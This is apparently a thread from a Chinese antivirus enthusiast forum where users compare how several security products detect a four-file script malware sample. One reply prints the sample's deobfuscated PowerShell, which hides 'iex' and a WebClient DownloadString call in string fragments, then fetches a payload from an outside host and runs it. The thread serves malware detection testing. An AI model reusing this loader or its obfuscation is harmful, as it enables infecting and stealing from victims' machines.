查看: 1415|回复: 12
收起左侧

[病毒样本] x4 (2024-01-18)

[复制链接]
petr0vic
发表于 2024-1-18 17:50:22 | 显示全部楼层 |阅读模式

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
UNknownOoo
发表于 2024-1-18 17:53:40 | 显示全部楼层
火绒
扫描:1X
  1. 扫描文件:4
  2. 发现风险:1
  3. 已处理风险:0
  4. 病毒详情:
  5. 风险路径:C:\Users\UnknownOoo\Downloads\Compressed\4\4.js, 病毒名:TrojanDownloader/JS.Agent.ea, 病毒ID:81a67eb0c32ef748, 处理结果:暂不处理
复制代码


X-Sec
扫描:云黑 1X
  1. ---------------------
  2. 2024/01/18 17:52:41 Threat Detected: C:\Users\UnknownOoo\Downloads\Compressed\4\2.vbs -- [rame-cloud] Stealer.Agent/VBS!8.14FBA
复制代码
tony099
发表于 2024-1-18 17:54:56 | 显示全部楼层
本帖最后由 tony099 于 2024-1-18 18:05 编辑

卡巴KTS 21.15扫描--2.vbs   HEUR:Trojan-PSW.VBS.Stealer.gen

1.js 3.bat 4.js   KSN未知



本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
123456aaaafsdeg
发表于 2024-1-18 17:55:23 | 显示全部楼层
  1. 360 Total Security扫描日志

  2. 扫描时间:2024-01-18 17:55:01
  3. 扫描用时:00:00:03
  4. 扫描项目总数:4
  5. 威胁总数:2
  6. 处理威胁数:2

  7. 扫描选项
  8. ----------------------
  9. 扫描压缩包:否
  10. 常规引擎设置:鲲鹏引擎

  11. 扫描内容
  12. ----------------------
  13. C:\Users\Administrator\Desktop\新建文件夹\1.js
  14. C:\Users\Administrator\Desktop\新建文件夹\2.vbs
  15. C:\Users\Administrator\Desktop\新建文件夹\3.bat
  16. C:\Users\Administrator\Desktop\新建文件夹\4.js

  17. 扫描结果
  18. ======================
  19. 高风险项目
  20. ----------------------
  21. C:\Users\Administrator\Desktop\新建文件夹\2.vbs E762FAA083EAAF4F5915CD95D16440E7 C41D2FAB90FCAB1821D1344D4A35C4223BA8D77E 70,6,2,4,280,1,256, || 0_0_0  [QEX脚本查杀引擎][virus.vbs.qexvmc.1][隔离文件][已处理]
  22. C:\Users\Administrator\Desktop\新建文件夹\4.js 2ED38A86AF89FB67CBCCCD09135EDEA2 FA935B38B6DB4E0C8AE3A10CAEFAD447A935497C 70,6,2,4,280,1,256, || 0_3_0  [QEX脚本查杀引擎][virus.js.qexvmc.1065][隔离文件][已处理]
复制代码
Agu
发表于 2024-1-18 17:56:57 | 显示全部楼层
本帖最后由 Agu 于 2024-1-18 17:59 编辑

WSCS - 掃描0X

DeepGuard攔截4.js

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
DisaPDB
发表于 2024-1-18 17:59:45 | 显示全部楼层
本帖最后由 DisaPDB 于 2024-1-18 18:11 编辑

Qihoo360 scan 2x.

Run 1.js

3.bat

4/4 in all.
AVG scan 1x.

Run 1x

2/4 in all.
  1. $rt='x','e','I';[Array]::Reverse($rt);
  2. sal z ($rt -join '');
  3. $t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);
  4. [System.Net.ServicePointManager]::SecurityProtocol = $t56fg;
  5. $tpg='[void','] [Syst','em.Refle','ction.Asse','mbly]::LoadWi','thPartialName(''Microsoft.VisualBasic'')';
  6. z($tpg -join '');
  7. do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);
  8. $tty55='(New-','Obje','ct Ne','t.We','bCli','ent)';
  9. $tty=z($tty55 -join '');
  10. $rot='Down','load','Str','ing';
  11. $rotJ=($rot -join '');
  12. $bnt='https','://pizzamadre.com.ar/M13C.jpg';
  13. $bntJ=($bnt -join '');
  14. $mv= [Microsoft.VisualBasic.Interaction]::CallByname($tty,$rotJ,[Microsoft.VisualBasic.CallType]::Method,$bntJ);
  15. z($mv)
复制代码



本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x

评分

参与人数 1人气 +1 收起 理由
123456aaaafsdeg + 1

查看全部评分

LSPLDD
发表于 2024-1-18 18:57:03 | 显示全部楼层
卡巴2X
2.vbs
HEUR:Trojan-PSW.VBS.Stealer.gen
4.js
HEUR:Trojan-Downloader.Script.Generic
无反应:
1.js
3.bat

BD3X
3.bat
Dropped:Trojan.BAT.Agent.TT
2.vbs
Gen:Suspicious.Cloud.12.0039A21E840000
4.js
Gen:Suspicious.Cloud.12.00081D7BF30000
无反应:
1.js

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
hhhq316
头像被屏蔽
发表于 2024-1-18 19:14:24 | 显示全部楼层
安天 2

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
Nocria
发表于 2024-1-18 19:45:11 | 显示全部楼层
本帖最后由 Nocria 于 2024-1-18 20:57 编辑

IKARUS - 2/4



To IKARUS.


Dear Ladies and Gentlemen,
Sehr geehrte Damen und Herren,

Many thanks for the delivered file.

***** virus / malware *****

This is a malicious file (virus/trojan/malware). Please remove the malicious file in the quarantine with the "Purge System" button. If the removal task fails please contact IKARUS Support (support@ikarus.at).

This is an automatic generated e-mail, please do not reply.


Vielen Dank für die von Ihnen eingesandte Datei.

***** Virus / Malware *****

Bei dieser Datei handelt es sich um Schadcode (Virus/Trojaner/Malware). Versuchen Sie den Virus in der Quarantäne mit dem Button "Bereinigen"
zu entfernen. Sollte die Bereinigung nicht gelingen wenden Sie sich bitte an an den IKARUS Support (support@ikarus.at).

Dies ist eine automatisch generierte Nachricht, bitte antworten Sie nicht auf diese Nachricht.

Kind Regards,
Mit freundlichen Grüßen

----------------------------------
IKARUS Security Software GmbH
Analyse
Blechturmgasse 11, A-1050 Wien
----------------------------------


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-11-1 14:36 , Processed in 0.126578 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表